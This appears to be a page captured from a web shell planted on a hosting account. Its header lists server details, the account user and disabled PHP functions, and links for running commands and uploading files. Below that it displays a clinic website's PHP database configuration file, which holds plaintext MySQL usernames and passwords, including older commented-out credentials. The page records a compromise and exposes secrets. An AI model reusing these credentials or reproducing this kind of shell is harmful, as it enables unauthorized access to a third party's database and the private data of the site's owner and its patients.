Server IP : 153.92.220.142 / Your IP : 13.59.212.110 Web Server : LiteSpeed System : Linux nl-srv-web516.main-hosting.eu 4.18.0-513.9.1.lve.el7h.x86_64 #1 SMP Mon Dec 4 13:57:13 UTC 2023 x86_64 User : u444427800 ( 444427800) PHP Version : 8.1.27 Disable Function : system, exec, shell_exec, passthru, mysql_list_dbs, ini_alter, dl, symlink, link, chgrp, leak, popen, apache_child_terminate, virtual, mb_send_mail MySQL : OFF | cURL : ON | WGET : ON | Perl : OFF | Python : OFF Directory (0755) : /home/u444427800/domains/aaryashdermajoint.com/public_html/admin/gallery/../ |
[ Home ] | [ C0mmand ] | [ Upload File ] |
---|
<?php session_start(); ini_set('display_errors', '1'); ini_set('display_startup_errors', '1'); error_reporting(E_ALL); // $servername = "localhost"; // $username = "u444427800_reliveuser"; // $password = "Relive@@##2/421"; // $db = "u444427800_relive"; $servername = "localhost"; $username = "u444427800_aaryashclinic"; $password = "Aaryashclinic@123!@#"; $database = "u444427800_aaryashclinic"; // Create connection some change $conn = new mysqli($servername, $username, $password, $database); // Check connection if ($conn->connect_error) { die("Connection failed: " . $conn->connect_error); } // echo "Connected successfully";?>